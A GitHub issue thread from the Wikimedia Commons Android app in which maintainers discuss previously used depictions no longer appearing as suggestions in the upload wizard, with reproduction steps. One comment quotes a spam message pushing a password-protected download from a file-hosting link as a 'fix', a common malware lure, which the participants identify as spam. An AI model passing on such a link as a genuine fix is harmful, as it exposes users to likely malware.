### ISSUE TITLE
Previously used depictions not shown in upload wizard

### ISSUE THREAD

**Issue by nicolas-raoul** [commons-app/apps-android-commons#5791] opened 2024-08-27 08:05 UTC
Before [this change](https://github.com/commons-app/apps-android-commons/pull/5741/files), depictions used in the past were shown as suggestions.

In the latest main branch, these depictions are not shown anymore. They are correctly saved (_I tested by uploading with latest main then with the change's previous commit 31bb1a73c0c6848c381ab2e769e074e849e71e3d_), but just not shown.

The problem may be from [this line](https://github.com/commons-app/apps-android-commons/pull/5741/files#diff-c8a649712c10922413369404557a3c017ab4a69c748f9cd7d310d72df224af76L271).

**Comment by rohit9625** [comment] 2024-08-27 08:26
How can I reproduce this bug? I haven't pulled from the main since that PR merged and the suggestions are still not showing. I didn't get the context of this issue.

**Comment by nicolas-raoul** [comment] 2024-08-27 08:30
Steps:
1. Upload an image with a depiction such as "rabbit" (I believe you do not need to actually tap the final upload button, the depictions will be saved anyway.
2. Start the upload wizard for another image. At the depictions step, the depiction "rabbit" is expected to be suggested, but unfortunately it is not.

**Comment by rohit9625** [comment] 2024-08-27 08:36
What is this fix?

> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

**Comment by nicolas-raoul** [comment] 2024-08-27 08:40
That was probably spam, better not click the link haha.

**Comment by rohit9625** [comment] 2024-08-27 08:43
That's why I didn't click it. Well, I got this problem and looking for what causing this bug.

**Comment by nicolas-raoul** [comment] 2024-08-27 08:45
> I got this problem and looking for what causing this bug

Fantastic!
By the way thanks for the generally very high-quality code of that pull request.

**Comment by rohit9625** [comment] 2024-08-27 08:52
Thank you @nicolas-raoul :)
I want to ask about the **`Upgrade to SDK 34` PR**. Is the current flow of permissions good? At which place does the app require the `Location` of the photo from the meta-data? 
When implementing the photo picker(if required), I have to manage this location stuff also.

**Closed** 2024-08-27 14:07 UTC
Labels: bug
